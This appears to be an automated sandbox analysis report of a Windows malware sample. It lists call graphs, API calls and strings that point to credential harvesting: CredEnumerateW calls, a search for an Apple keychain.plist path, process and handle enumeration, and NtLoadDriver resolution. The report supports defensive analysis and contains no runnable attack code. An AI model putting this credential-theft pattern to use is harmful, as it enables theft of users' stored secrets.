40234->40157 40235->40151 40236->40152 40238 417044 40237->40238 40239 41705c 40237->40239 40241 416760 11 API calls 40238->40241 40243 417055 40238->40243 40240 417075 40239->40240 40242 41707a 11 API calls 40239->40242 40240->40163 40241->40243 40242->40238 40243->40163 40244->40195 40245->40168 40246->40168 40247->40168 40248->40168 40249->40168 40250->40186 40251->40169 40252->40173 40253->40176 40254->40182 40255->40194 40261 415cfe 40256->40261 40265 415d23 __aullrem __aulldvrm 40261->40265 40268 41628e 40261->40268 40262 4163ca 40275 416422 11 API calls 40262->40275 40264 416172 memset 40264->40265 40265->40262 40265->40264 40266 416422 10 API calls 40265->40266 40267 415cb9 10 API calls 40265->40267 40265->40268 40266->40265 40267->40265 40269 416520 40268->40269 40270 416527 40269->40270 40274 416574 40269->40274 40272 416544 40270->40272 40270->40274 40276 4156aa 11 API calls 40270->40276 40273 416561 memcpy 40272->40273 40272->40274 40273->40274 40274->40066 40275->40268 40276->40272 40298 41493c EnumResourceNamesW 37679 4287c1 37680 4287d2 37679->37680 37681 429ac1 37679->37681 37682 428818 37680->37682 37683 42881f 37680->37683 37703 425711 37680->37703 37693 425ad6 37681->37693 37749 415c56 11 API calls 37681->37749 37716 42013a 37682->37716 37744 420244 96 API calls 37683->37744 37687 4260dd 37743 424251 119 API calls 37687->37743 37689 4259da 37742 416760 11 API calls 37689->37742 37694 429a4d 37699 429a66 37694->37699 37700 429a9b 37694->37700 37697 422aeb memset memcpy memcpy 37697->37703 37745 415c56 11 API calls 37699->37745 37702 429a96 37700->37702 37747 416760 11 API calls 37700->37747 37748 424251 119 API calls 37702->37748 37703->37681 37703->37689 37703->37694 37703->37697 37704 4260a1 37703->37704 37712 4259c2 37703->37712 37715 425a38 37703->37715 37732 4227f0 memset memcpy 37703->37732 37733 422b84 15 API calls 37703->37733 37734 422b5d memset memcpy memcpy 37703->37734 37735 422640 13 API calls 37703->37735 37737 4241fc 11 API calls 37703->37737 37738 42413a 89 API calls 37703->37738 37741 415c56 11 API calls 37704->37741 37705 429a7a 37746 416760 11 API calls 37705->37746 37712->37693 37736 415c56 11 API calls 37712->37736 37715->37712 37739 422640 13 API calls 37715->37739 37740 4226e0 12 API calls 37715->37740 37717 42014c 37716->37717 37720 420151 37716->37720 37759 41e466 96 API calls 37717->37759 37719 420162 37719->37703 37720->37719 37721 4201b3 37720->37721 37722 420229 37720->37722 37723 4201b8 37721->37723 37724 4201dc 37721->37724 37722->37719 37725 41fd5e 85 API calls 37722->37725 37750 41fbdb 37723->37750 37724->37719 37729 4201ff 37724->37729 37756 41fc4c 37724->37756 37725->37719 37729->37719 37731 42013a 96 API calls 37729->37731 37731->37719 37732->37703 37733->37703 37734->37703 37735->37703 37736->37689 37737->37703 37738->37703 37739->37715 37740->37715 37741->37689 37742->37687 37743->37693 37744->37703 37745->37705 37746->37702 37747->37702 37748->37681 37749->37689 37751 41fbf8 37750->37751 37754 41fbf1 37750->37754 37764 41ee26 37751->37764 37755 41fc39 37754->37755 37774 4446ce 11 API calls 37754->37774 37755->37719 37760 41fd5e 37755->37760 37757 41ee6b 85 API calls 37756->37757 37758 41fc5d 37757->37758 37758->37724 37759->37720 37762 41fd65 37760->37762 37761 41fdab 37761->37719 37762->37761 37763 41fbdb 85 API calls 37762->37763 37763->37762 37765 41ee41 37764->37765 37766 41ee32 37764->37766 37775 41edad 37765->37775 37778 4446ce 11 API calls 37766->37778 37769 41ee3c 37769->37754 37772 41ee58 37772->37769 37780 41ee6b 37772->37780 37774->37755 37784 41be52 37775->37784 37778->37769 37779 41eb85 11 API calls 37779->37772 37781 41ee70 37780->37781 37782 41ee78 37780->37782 37837 41bf99 85 API calls 37781->37837 37782->37769 37785 41be6f 37784->37785 37786 41be5f 37784->37786 37792 41be8c 37785->37792 37816 418c63 memset memset 37785->37816 37815 4446ce 11 API calls 37786->37815 37788 41be69 37788->37769 37788->37779 37790 41bee7 37790->37788 37820 41a453 85 API calls 37790->37820 37792->37788 37792->37790 37793 41bf3a 37792->37793 37794 41bed1 37792->37794 37819 4446ce 11 API calls 37793->37819 37796 41bef0 37794->37796 37799 41bee2 37794->37799 37796->37790 37797 41bf01 37796->37797 37798 41bf24 memset 37797->37798 37800 41bf14 37797->37800 37817 418a6d memset memcpy memset 37797->37817 37798->37788 37805 41ac13 37799->37805 37818 41a223 memset memcpy memset 37800->37818 37804 41bf20 37804->37798 37806 41ac52 37805->37806 37807 41ac3f memset 37805->37807 37810 41ac6a 37806->37810 37821 41dc14 19 API calls 37806->37821 37808 41acd9 37807->37808 37808->37790 37812 41aca1 37810->37812 37822 41519d 37810->37822 37812->37808 37813 41acc0 memset 37812->37813 37814 41accd memcpy 37812->37814 37813->37808 37814->37808 37815->37788 37816->37792 37817->37800 37818->37804 37819->37790 37821->37810 37825 4175ed 37822->37825 37833 417570 SetFilePointer 37825->37833 37828 41760a ReadFile 37830 417637 37828->37830 37831 417627 GetLastError 37828->37831 37829 4151b3 37829->37812 37830->37829 37832 41763e memset 37830->37832 37831->37829 37832->37829 37834 4175b2 37833->37834 37835 41759c GetLastError 37833->37835 37834->37828 37834->37829 37835->37834 37836 4175a8 GetLastError 37835->37836 37836->37834 37837->37782 37838 417bc5 37840 417c61 37838->37840 37844 417bda 37838->37844 37839 417bf6 UnmapViewOfFile CloseHandle 37839->37839 37839->37844 37842 417c2c 37842->37844 37850 41851e 18 API calls 37842->37850 37844->37839 37844->37840 37844->37842 37845 4175b7 37844->37845 37846 4175d6 CloseHandle 37845->37846 37847 4175c8 37846->37847 37848 4175df 37846->37848 37847->37848 37849 4175ce Sleep 37847->37849 37848->37844 37849->37846 37850->37842 39755 4147f3 39758 414561 39755->39758 39757 414813 39759 41456d 39758->39759 39760 41457f GetPrivateProfileIntW 39758->39760 39763 4143f1 memset _itow WritePrivateProfileStringW 39759->39763 39760->39757 39762 41457a 39762->39757 39763->39762

                                                                                        Executed Functions

                                                                                        Function 0040DD85 Relevance: 31.7, APIs: 15, Strings: 3, Instructions: 212filenativeCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 338 40dd85-40ddeb memset call 409bca CreateFileW 341 40ddf1-40de09 call 40afcf call 41352f 338->341 346 40de0b-40de1a NtQuerySystemInformation 341->346 347 40de1c 341->347 348 40de20-40de27 346->348 347->348 349 40de29-40de39 348->349 350 40de3b-40de52 CloseHandle GetCurrentProcessId 348->350 349->341 349->350 351 40de54-40de58 350->351 352 40de7a-40de8e call 413cfa call 413d4c 350->352 351->352 354 40de5a 351->354 362 40de94-40debb call 40e6ad call 409c52 _wcsicmp 352->362 363 40e00c-40e01b call 413d29 352->363 356 40de5d-40de63 354->356 357 40de74-40de78 356->357 358 40de65-40de6c 356->358 357->352 357->356 358->357 360 40de6e-40de71 358->360 360->357 370 40dee7-40def7 OpenProcess 362->370 371 40debd-40dece _wcsicmp 362->371 372 40dff8-40dffb 370->372 373 40defd-40df02 370->373 371->370 374 40ded0-40dee1 _wcsicmp 371->374 372->363 377 40dffd-40e006 372->377 375 40df08 373->375 376 40dfef-40dff2 CloseHandle 373->376 374->370 374->377 378 40df0b-40df10 375->378 376->372 377->362 377->363 379 40df16-40df1d 378->379 380 40dfbd-40dfcb 378->380 379->380 382 40df23-40df4a GetCurrentProcess DuplicateHandle 379->382 380->378 381 40dfd1-40dfd3 380->381 381->376 382->380 383 40df4c-40df76 memset call 41352f 382->383 386 40df78-40df8a 383->386 387 40df8f-40dfbb CloseHandle call 409c52 * 2 _wcsicmp 383->387 386->387 387->380 392 40dfd5-40dfed 387->392 392->376
                                                                                        APIs
                                                                                        • memset.MSVCRT ref: 0040DDAD
                                                                                          • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                                        • CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                                          • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                                          • Part of subcall function 0041352F: GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                                                          • Part of subcall function 0041352F: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                                                                          • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                                                                          • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                                                                          • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                                                                          • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                                                                          • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                                                                          • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                                                                          • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                                                                        • NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                                        • CloseHandle.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                                                        • GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                                        • _wcsicmp.MSVCRT ref: 0040DEB2
                                                                                        • _wcsicmp.MSVCRT ref: 0040DEC5
                                                                                        • _wcsicmp.MSVCRT ref: 0040DED8
                                                                                        • OpenProcess.KERNEL32(00000040,00000000,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DEEC
                                                                                        • GetCurrentProcess.KERNEL32(C0000004,80000000,00000000,00000002,?,000000FF,00000000,00000104), ref: 0040DF32
                                                                                        • DuplicateHandle.KERNELBASE(00000104,?,00000000,?,000000FF,00000000,00000104), ref: 0040DF41
                                                                                        • memset.MSVCRT ref: 0040DF5F
                                                                                        • CloseHandle.KERNEL32(C0000004,?,?,?,?,000000FF,00000000,00000104), ref: 0040DF92
                                                                                        • _wcsicmp.MSVCRT ref: 0040DFB2
                                                                                        • CloseHandle.KERNEL32(00000104,?,000000FF,00000000,00000104), ref: 0040DFF2
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressProc$Handle$_wcsicmp$CloseProcess$CurrentFileModulememset$??2@CreateDuplicateInformationNameOpenQuerySystem
                                                                                        • String ID: dllhost.exe$taskhost.exe$taskhostex.exe
                                                                                        • API String ID: 708747863-3398334509
                                                                                        • Opcode ID: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                                                                                        • Instruction ID: 75e999e9478e2cd8c236028a88c267773407d5e0538ee9298daa3020847ac7a6
                                                                                        • Opcode Fuzzy Hash: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                                                                                        • Instruction Fuzzy Hash: 57818F71D00209AFEB10EF95CC81AAEBBB5FF04345F20407AF915B6291DB399E95CB58
                                                                                        Function 00413D4C Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 142processlibraryloaderCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 636 413d4c-413da0 call 40b633 CreateToolhelp32Snapshot memset Process32FirstW 639 413f00-413f11 Process32NextW 636->639 640 413da5-413ded OpenProcess 639->640 641 413f17-413f24 CloseHandle 639->641 642 413eb0-413eb5 640->642 643 413df3-413e26 memset call 413f27 640->643 642->639 644 413eb7-413ebd 642->644 651 413e79-413e9d call 413959 call 413ca4 643->651 652 413e28-413e35 643->652 646 413ec8-413eda call 4099f4 644->646 647 413ebf-413ec6 free 644->647 649 413edb-413ee2 646->649 647->649 655 413ee4 649->655 656 413ee7-413efe 649->656 663 413ea2-413eae CloseHandle 651->663 653 413e61-413e68 652->653 654 413e37-413e44 GetModuleHandleW 652->654 653->651 660 413e6a-413e76 653->660 654->653 659 413e46-413e5c GetProcAddress 654->659 655->656 656->639 659->653 660->651 663->642
                                                                                        APIs
                                                                                          • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,?), ref: 00413D6A
                                                                                        • memset.MSVCRT ref: 00413D7F
                                                                                        • Process32FirstW.KERNEL32(00000000,?), ref: 00413D9B
                                                                                        • OpenProcess.KERNEL32(00000410,00000000,?,?,?,?), ref: 00413DE0
                                                                                        • memset.MSVCRT ref: 00413E07
                                                                                        • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 00413E3C
                                                                                        • GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 00413E56
                                                                                        • CloseHandle.KERNEL32(?,?,?,?,00000000,?), ref: 00413EA8
                                                                                        • free.MSVCRT ref: 00413EC1
                                                                                        • Process32NextW.KERNEL32(00000000,0000022C), ref: 00413F0A
                                                                                        • CloseHandle.KERNEL32(00000000,00000000,0000022C), ref: 00413F1A
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: Handle$CloseProcess32freememset$AddressCreateFirstModuleNextOpenProcProcessSnapshotToolhelp32
                                                                                        • String ID: QueryFullProcessImageNameW$kernel32.dll
                                                                                        • API String ID: 1344430650-1740548384
                                                                                        • Opcode ID: 0a5514244f8da3553e93fddd8650c41e468bd34edf4168a604947191dfb6c3d8
                                                                                        • Instruction ID: a891ebf292d3308fa7e32b9fbc5d589fb36fb38cf1b6cbdc37d41f3709903cdc
                                                                                        • Opcode Fuzzy Hash: 0a5514244f8da3553e93fddd8650c41e468bd34edf4168a604947191dfb6c3d8
                                                                                        • Instruction Fuzzy Hash: B4518FB2C00218ABDB10DF5ACC84ADEF7B9AF95305F1041ABE509A3251D7795F84CFA9
                                                                                        Function 004148B6 Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • FindResourceW.KERNELBASE(?,?,?), ref: 004148C3
                                                                                        • SizeofResource.KERNEL32(?,00000000), ref: 004148D4
                                                                                        • LoadResource.KERNEL32(?,00000000), ref: 004148E4
                                                                                        • LockResource.KERNEL32(00000000), ref: 004148EF
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: Resource$FindLoadLockSizeof
                                                                                        • String ID:
                                                                                        • API String ID: 3473537107-0
                                                                                        • Opcode ID: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                                                        • Instruction ID: 8a72e2f5d7590eb6bb033c3ed88c96ec9d5eb8bcd973c23d1c6560583cb0a60d
                                                                                        • Opcode Fuzzy Hash: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                                                        • Instruction Fuzzy Hash: 0101D2727402156B8B294FB6DD4999BBFAEFFC6391308803AF809D6331DA31C851C688
                                                                                        Function 00418758 Relevance: 4.6, APIs: 3, Instructions: 79COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00418680: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                                          • Part of subcall function 00418680: malloc.MSVCRT ref: 004186B7
                                                                                          • Part of subcall function 00418680: free.MSVCRT ref: 004186C7
                                                                                          • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                        • GetDiskFreeSpaceW.KERNELBASE(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187D2
                                                                                        • GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187FA
                                                                                        • free.MSVCRT ref: 00418803
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: DiskFreeSpacefree$FullNamePathVersionmalloc
                                                                                        • String ID:
                                                                                        • API String ID: 1355100292-0
                                                                                        • Opcode ID: d2c930e6252e89cba164dd291f6fd6a93c7c4142cb300574fab5a2c635c3ca3b
                                                                                        • Instruction ID: 9f5aa8738ec5ca8fa6c7af21032fcab0d24b7c3e7281463e4f88d86f77cdc7da
                                                                                        • Opcode Fuzzy Hash: d2c930e6252e89cba164dd291f6fd6a93c7c4142cb300574fab5a2c635c3ca3b
                                                                                        • Instruction Fuzzy Hash: 2A218776904118AEEB11EBA4CC849EF77BCEF05704F2404AFE551D7181EB784EC58769
                                                                                        Function 0040AE51 Relevance: 3.0, APIs: 2, Instructions: 39fileCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • FindFirstFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE67
                                                                                        • FindNextFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE83
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileFind$FirstNext
                                                                                        • String ID:
                                                                                        • API String ID: 1690352074-0
                                                                                        • Opcode ID: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                                        • Instruction ID: bc213c2af839868520f9a45b85e911a0cf9bcc257b6b56acf9ba21b23a9e6198
                                                                                        • Opcode Fuzzy Hash: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                                        • Instruction Fuzzy Hash: 34F0C877040B005BD761C774D8489C733D89F84320B20063EF56AD32C0EB3899098755
                                                                                        Function 00418981 Relevance: 3.0, APIs: 2, Instructions: 28COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • memset.MSVCRT ref: 0041898C
                                                                                        • GetSystemInfo.KERNELBASE(004725C0,?,00000000,004439D6,?,00445FAE,?,?,?,?,?,?), ref: 00418995
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: InfoSystemmemset
                                                                                        • String ID:
                                                                                        • API String ID: 3558857096-0
                                                                                        • Opcode ID: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                                                                        • Instruction ID: bf8bfd662ffca2911032058da6995c9eeb4a28626cb6ee34ade21af96d3a2c90
                                                                                        • Opcode Fuzzy Hash: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                                                                        • Instruction Fuzzy Hash: C0E06531A0163097F22077766C067DF25949F41395F04407BB9049A186EBAC4D8546DE
                                                                                        Function 0044553B Relevance: 44.5, APIs: 23, Strings: 2, Instructions: 758COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 0 44553b-445558 call 44db70 3 445599-4455a2 0->3 4 44555a-44557c call 40c768 call 40bdb0 call 4135f7 0->4 5 4455a8-4455e3 memset call 403988 wcsrchr 3->5 6 4457fb 3->6 42 44558e-445594 call 444b06 4->42 43 44557e-44558c call 4136c0 call 41366b 4->43 15 4455e5 5->15 16 4455e8-4455f9 5->16 10 445800-445809 6->10 13 445856-44585f 10->13 14 44580b-44581e call 40a889 call 403e2d 10->14 18 445861-445874 call 40a889 call 403c9c 13->18 19 4458ac-4458b5 13->19 45 445823-445826 14->45 15->16 21 445672-445683 call 40a889 call 403fbe 16->21 22 4455fb-445601 16->22 53 445879-44587c 18->53 23 44594f-445958 19->23 24 4458bb-44592b memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 19->24 87 445685 21->87 88 4456b2-4456b5 call 40b1ab 21->88 30 445605-445607 22->30 31 445603 22->31 28 4459f2-4459fa 23->28 29 44595e-4459ce memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 23->29 139 44592d-445945 call 40b6ef 24->139 140 44594a 24->140 37 445a00-445aa1 memset * 2 call 414c2e call 40b2cc call 409d1f call 40b2cc call 40ae18 28->37 38 445b29-445b32 28->38 157 4459d0-4459e8 call 40b6ef 29->157 158 4459ed 29->158 30->21 41 445609-44560d 30->41 31->30 182 445b08-445b15 call 40ae51 37->182 54 445c7c-445c85 38->54 55 445b38-445b96 memset * 3 38->55 41->21 51 44560f-445641 call 4087b3 call 40a889 call 4454bf 41->51 42->3 43->42 56 44584c-445854 call 40b1ab 45->56 57 445828 45->57 154 445665-445670 call 40b1ab 51->154 155 445643-445663 call 40a9b5 call 4087b3 51->155 67 4458a2-4458aa call 40b1ab 53->67 68 44587e 53->68 63 445d1c-445d25 54->63 64 445c8b-445cf3 memset * 2 call 414c2e call 409d1f call 409b98 54->64 69 445bd4-445c72 call 414c2e call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 55->69 70 445b98-445ba0 55->70 56->13 71 44582e-445847 call 40a9b5 call 4087b3 57->71 76 445fae-445fb2 63->76 77 445d2b-445d3b 63->77 159 445cf5 64->159 160 445cfc-445d03 64->160 67->19 85 445884-44589d call 40a9b5 call 4087b3 68->85 249 445c77 69->249 70->69 86 445ba2-445bcf call 4099c6 call 445403 call 445389 70->86 142 445849 71->142 94 445d3d-445d65 call 409c52 call 40b2cc _wcsicmp 77->94 95 445d88-445e15 memset * 3 call 414c2e call 40b2cc call 409d1f call 409b98 77->95 146 44589f 85->146 86->54 89 44568b-4456a4 call 40a9b5 call 4087b3 87->89 107 4456ba-4456c4 88->107 148 4456a9-4456b0 89->148 165 445d67-445d6c 94->165 166 445d71-445d83 call 445093 94->166 196 445e17 95->196 197 445e1e-445e25 95->197 121 4457f9 107->121 122 4456ca-4456d3 call 413cfa call 413d4c 107->122 121->6 174 4456d8-4456f7 call 40b2cc call 413fa6 122->174 139->140 140->23 142->56 146->67 148->88 148->89 154->107 155->154 157->158 158->28 159->160 171 445d05-445d13 160->171 172 445d17 160->172 176 445fa1-445fa9 call 40b6ef 165->176 166->76 171->172 172->63 206 4456fd-445796 memset * 4 call 409c70 * 3 174->206 207 4457ea-4457f7 call 413d29 174->207 176->76 200 445b17-445b27 call 40aebe 182->200 201 445aa3-445ab0 call 40add4 182->201 196->197 202 445e27-445e59 call 40b2cc call 409d1f call 409b98 197->202 203 445e6b-445e7e call 445093 197->203 200->38 201->182 221 445ab2-445b03 memset call 40b2cc call 409d1f call 445389 201->221 239 445e62-445e69 202->239 240 445e5b 202->240 220 445f67-445f99 call 40b2cc call 409d1f call 409b98 203->220 206->207 248 445798-4457ca call 40b2cc call 409d1f call 409b98 206->248 207->10 220->76 253 445f9b 220->253 221->182 239->203 245 445e83-445ef5 memset call 40b2cc call 409d1f call 40ae18 239->245 240->239 264 445f4d-445f5a call 40ae51 245->264 248->207 265 4457cc-4457e5 call 4087b3 248->265 249->54 253->176 269 445ef7-445f04 call 40add4 264->269 270 445f5c-445f62 call 40aebe 264->270 265->207 269->264 274 445f06-445f38 call 40b2cc call 409d1f call 409b98 269->274 270->220 274->264 281 445f3a-445f48 call 445093 274->281 281->264
                                                                                        APIs
                                                                                        • memset.MSVCRT ref: 004455C2
                                                                                        • wcsrchr.MSVCRT ref: 004455DA
                                                                                        • memset.MSVCRT ref: 0044570D
                                                                                        • memset.MSVCRT ref: 00445725
                                                                                          • Part of subcall function 0040C768: _wcslwr.MSVCRT ref: 0040C817
                                                                                          • Part of subcall function 0040C768: wcslen.MSVCRT ref: 0040C82C
                                                                                          • Part of subcall function 0040BDB0: CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                                                          • Part of subcall function 0040BDB0: wcslen.MSVCRT ref: 0040BE06
                                                                                          • Part of subcall function 0040BDB0: wcsncmp.MSVCRT ref: 0040BE38
                                                                                          • Part of subcall function 0040BDB0: memset.MSVCRT ref: 0040BE91
                                                                                          • Part of subcall function 0040BDB0: memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
                                                                                          • Part of subcall function 004135F7: GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                                                        • memset.MSVCRT ref: 0044573D
                                                                                        • memset.MSVCRT ref: 00445755
                                                                                        • memset.MSVCRT ref: 004458CB
                                                                                        • memset.MSVCRT ref: 004458E3
                                                                                        • memset.MSVCRT ref: 0044596E
                                                                                        • memset.MSVCRT ref: 00445A10
                                                                                        • memset.MSVCRT ref: 00445A28
                                                                                        • memset.MSVCRT ref: 00445AC6
                                                                                          • Part of subcall function 00445093: GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                                          • Part of subcall function 00445093: ??2@YAPAXI@Z.MSVCRT(0000000A,?,?,00000104), ref: 004450BE
                                                                                          • Part of subcall function 00445093: memset.MSVCRT ref: 004450CD
                                                                                          • Part of subcall function 00445093: ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                                                                          • Part of subcall function 00445093: CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                                                        • memset.MSVCRT ref: 00445B52
                                                                                        • memset.MSVCRT ref: 00445B6A
                                                                                        • memset.MSVCRT ref: 00445C9B
                                                                                        • memset.MSVCRT ref: 00445CB3
                                                                                        • _wcsicmp.MSVCRT ref: 00445D56
                                                                                        • memset.MSVCRT ref: 00445B82
                                                                                          • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                                          • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                                          • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                                          • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                                          • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                          • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040ADF3
                                                                                          • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040AE04
                                                                                        • memset.MSVCRT ref: 00445986
                                                                                          • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                          • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                          • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                          • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                          • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: memset$wcslen$File$wcscmpwcsrchr$??2@??3@AddressAttributesCloseCreateCredEnumerateHandleProcSize_wcsicmp_wcslwrmemcpywcscatwcscpywcsncmp
                                                                                        • String ID: *.*$Apple Computer\Preferences\keychain.plist
                                                                                        • API String ID: 2263259095-3798722523
                                                                                        • Opcode ID: 60142fc224ce82f33f024026baff3817031bc91c0ca8ee6e0e9eeeaa230f4715
                                                                                        • Instruction ID: 0d822d17a5609fa1e1b699618fc72e24fb48bc28b5d87ede4d5502c71e25afa2
                                                                                        • Opcode Fuzzy Hash: 60142fc224ce82f33f024026baff3817031bc91c0ca8ee6e0e9eeeaa230f4715
                                                                                        • Instruction Fuzzy Hash: ED4278B29005196BEB10E761DD46EDFB37CEF45358F1001ABF508A2193EB385E948B9A
                                                                                        Function 0041276D Relevance: 35.1, APIs: 17, Strings: 3, Instructions: 149COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                          • Part of subcall function 004044A4: LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
